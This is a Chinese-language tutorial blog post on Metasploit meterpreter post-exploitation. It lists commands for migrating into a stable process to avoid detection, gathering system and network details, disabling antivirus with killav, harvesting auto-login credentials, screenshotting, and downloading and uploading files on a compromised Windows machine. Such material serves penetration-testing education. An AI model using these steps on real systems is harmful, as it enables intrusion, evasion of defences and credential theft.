metasploit后渗透之信息收集

后渗透工具:meterpreter
该工具具有多重功能,使后续的渗透变得更加容易
获取目标机的meterpreter shell后,就进入了后期渗透利用阶段
后期渗透模块有200多个
meterpreter优势:

  • 纯内存工作模式,不需要对磁盘进行任何写入操作
  • 使用加密通信协议,而且可以同时与几个信道通信
  • 在被攻击进程内工作,不需要创建新的进程
  • 易于在多进程之间迁移
  • 平台通用

进程迁移

刚获得meterpreter shell时,该shell极其脆弱并且易受攻击
第一步就是要移动这个shell,把它和目标机中一个稳定的进程绑定在一起,而不需要对磁盘进行任何的写入操作,这样可以使shell更难被检测到

在这里插入图片描述
使用ls查看目录
在这里插入图片描述
ps获得当前正在运行的进程
在这里插入图片描述
getpid查看meterpreter shell的进程号
在这里插入图片描述
手动进程迁移
在这里插入图片描述
自动进程迁移
进程迁移完成后原pid会自动关闭,如果没有自动关闭可以输入kill 2716杀掉该进程,使用自动迁移命令后,系统会自动寻找合适的进程然后迁移

系统命令

获得了稳定的进程后,接下来收集系统信息
在这里插入图片描述
使用sysinfo查看目标机的系统信息,例如操作系统和体系结构
在这里插入图片描述
使用run post/windows/gather/checkvm查看目标机是否是虚拟机
使用idletime查看目标机最近的运行时间
可以看到,已经运行了3min38sec
在这里插入图片描述
使用route命令查看目标机完整的网络设置
在这里插入图片描述
使用getuid查看当前目标机上已经渗透成功的用户名
在这里插入图片描述
可以使用run post/windows/manage/killav关闭杀毒软件
在这里插入图片描述
使用background命令将当前会话放到后台,适合多个meterpreter会话的情况下使用
在这里插入图片描述
可以在background后使用route add将路由加入路由表中
回到meterpreter状态:
在这里插入图片描述
sessions -I x 查看所有后台shell程序
session (-i) 1
回到id为1
在这里插入图片描述
列举当前登录的用户
在这里插入图片描述
列举应用程序
在这里插入图片描述
抓取自动登陆的用户名和密码
在这里插入图片描述
在这里插入图片描述
截取屏幕,使用screengrab需要首先load espia,随后才可以使用
也可以只是用screenshot
在这里插入图片描述
pwd或getwd查看当前处于目标机的哪个目录
getlwd查看本机当前处于哪个目录
cd切换目录
在这里插入图片描述
search -f *.txt -d c:/
可以查看目标机c盘目录下后缀为txt的所有文件
可以使用download进行下载,upload进行上传
命令示例:

download c:\test.txt /root
upload /root/test.txt c:\
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值